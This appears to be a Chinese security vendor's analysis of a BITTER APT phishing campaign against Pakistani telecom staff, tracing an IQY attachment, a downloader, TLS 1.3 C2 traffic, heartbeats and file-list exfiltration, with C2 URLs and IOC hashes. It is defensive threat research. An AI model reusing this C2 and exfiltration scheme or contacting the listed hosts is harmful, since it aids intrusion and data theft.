【观成科技】蔓灵花User下载者加密通信分析

GCKJ_08242025-09-02 1:04
  1. 概述

2025年5月7日,蔓灵花(BITTER)组织针对巴基斯坦电信公司工作人员发起钓鱼邮件攻击,投递伪装为安全简报的恶意邮件,附件为IQY类型的Web查询文件。该文件在用户执行后通过HTTP协议获取远程CMD指令并执行,进而下载User下载者vcswin.exe。vcswin.exe使用TLS 1.3协议与C2通信,先后完成系统信息上传、持久化组件gentwin.exe下载和安装,并定期发送心跳包以获取下一阶段载荷。

  • 执行过程

1 样本信息

|--------|-----------------------------------------------------------------------|
| 文件名 | Security Brief Report.msg |
| 文件Hash | 36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590[1] |
| 样本类型 | 钓鱼邮件 |
| 原始发件IP | 210.56.8.208(巴基斯坦) |

钓鱼邮件的附件是后缀为iqy的Web查询文件。iqy文件是一种简单的文本文件,默认使用Microsoft Excel打开。一旦用户打开该文件,Excel会自动访问文件中的URL,获取数据。

1 钓鱼邮件执行流程

恶意附件的执行链如下所示。

  1. 打开iqy文件,通过HTTP协议从"http[:]//fogomyart.com/random.php"处获取CMD命令并执行;
  2. CMD命令通过TLS协议从"https[:]//fogomyart.com/vcswin"处下载vcswin.exe并执行;
  3. vcswin.exe通过TLS协议上传系统信息到tradesmarkets.greenadelhouse.com
  4. vcswin.exe通过TLS协议从tradesmarkets.greenadelhouse.com处下载gentwin.exe并执行;
  5. gentwin.exe创建注册表项,实现C:\\ProgramData\\vcswin.exe自启动。
  • 加密通信分析
  1. 上线流量

vcswin.exe执行后访问URL"https[:]//tradesmarkets.greenadelhouse.com/crvtyfgvwicidnex.php",服务器响应数据"excertvnde52bek59vecnes26o"。

2 首次GET请求

3 首次GET请求(TLS1.3解密后)

随后vcswin.exe将用户名、计算机名和操作系统版本使用字符"*"进行拼接,Base64编码后赋值给vrocean,通过GET请求发送给服务器,服务器返回"gentwinUnable to open file!"。

4 上传系统信息

5 上传系统信息(TLS1.3解密后)

2.下载流量

上传系统信息后,vcswin.exe将用户名与服务器返回数据进行拼接,继续进行GET请求,请求URL为"https[:]//tradesmarkets.greenadelhouse.com/user/用户名/gentwinUnable%20to%20open%20file!"

6 下载流量

7 下载流量(TLS1.3解密后)

vcswin.exe继续向"https://tradesmarkets.greenadelhouse.com/excerorderslistoncbook.php?vrocean=TFkqODYxNzYqKldpbmRvd3MxMEVudGVycHJpc2U=\*\*"发送GET请求,服务器响应文件名"gentwin"。

8 获取文件名

9 获取文件名(TLS1.3解密后)

得到文件名后,vcswin.exe通过用户名拼接请求URL"https://tradesmarkets.greenadelhouse.com/user/LY/gentwin",下载exe文件

10 下载gentwin.exe

11 下载gentwin.exe(TLS1.3解密后)

​​​​​​​3.心跳流量

下载完gentwin.exe后,vcswin.exe每隔2~3秒向服务器发送心跳包,心跳包请求URL为"https://tradesmarkets.greenadelhouse.com/excerorderslistoncbook.php?vrocean=(Base64编码的系统信息)\*\*"。服务器会响应1字节的0x20。

12 心跳流量

13 心跳流量(TLS1.3解密后)

​​​​​​​4.数据回传

vcswin.exe还会收集程序运行目录下的文件信息拼接到URL中并通过GET请求回传给服务器。

14 回传文件列表

15 回传文件列表(TLS1.3解密后)

  • 产品检测

观成瞰云-加密威胁智能检测系统可对蔓灵花User下载者进行有效检出。

16 检测结果

  • 总结

蔓灵花User下载者延续了其多组件攻击链的一贯特点,与以往采用TLS1.2协议不同,本次攻击升级至TLS1.3协议。然而,相较于其他APT组织在协议加密外叠加内容加密的方式,蔓灵花User下载者仅依赖TLS协议本身进行加密传输。尽管通信数据经过TLS1.3协议加密,但其载荷长度特征仍可反映出明显的心跳行为。基于这一现象,通过单流载荷长度特征即可实现对该威胁的有效检测。观成科技安全研究团队将持续追踪蔓灵花组织的攻击活动,并及时更新相应的检测策略。

  • IOC

|------------------------------------------------------------------|
| 36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590 |
| 15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436 |
| edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56 |
| 76efa1cf9fcb1015ffd7f32f43c2865539fecfae6ae87a7607fd9ccad0f63896 |
| tradesmarkets.greenadelhouse.com |
| fogomyart.com |

相关推荐
北京耐用通信5 分钟前
工程师实战:如何以最小成本,耐达讯自动化无缝连接Profinet转DeviceNet网关
人工智能·物联网·网络协议·自动化·信息与通信
刘孬孬沉迷学习1 小时前
GTP协议
开发语言·学习·5g·php·信息与通信
xixixi777772 小时前
系统性地解析——边缘计算(从定义与驱动力、核心架构、关键技术特征、与云计算的范式对比、典型应用场景以及挑战与趋势等方面)
安全·架构·云计算·边缘计算·信息与通信·通信·反诈
程序员游老板15 小时前
基于SpringBoot3_vue3_MybatisPlus_Mysql_Maven的社区养老系统/养老院管理系统
java·spring boot·mysql·毕业设计·软件工程·信息与通信·毕设
飞来客isdn19 小时前
GD32F407ZGT6在FreeRTOS下串口中断接收异常情况及解决方法
单片机·mcu·freertos·信息与通信
是毛毛吧1 天前
开发环境配置指南:解决 GitHub 连接超时与依赖下载失败的问题
网络·git·网络安全·docker·信息与通信
小天互连即时通讯1 天前
深度拆解:IM 系统架构的分层设计思想
系统架构·信息与通信
DuHz2 天前
车对车对向交汇场景的毫米波路径损耗建模论文精读
论文阅读·算法·汽车·信息与通信·信号处理
添砖java‘’2 天前
常见的进程间通信方式详解
linux·c++·操作系统·信息与通信·进程通信
DuHz2 天前
汽车FMCW雷达互扰下的快速目标检测:谱峰累积法与泊松CFAR精读与推导
论文阅读·算法·目标检测·汽车·信息与通信·信号处理
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04【AutoGLM部署】本地私有化部署AI手机Agent05Open-AutoGLM Windows 安装部署教程06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09BongoCat - 跨平台键盘猫动画工具10【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)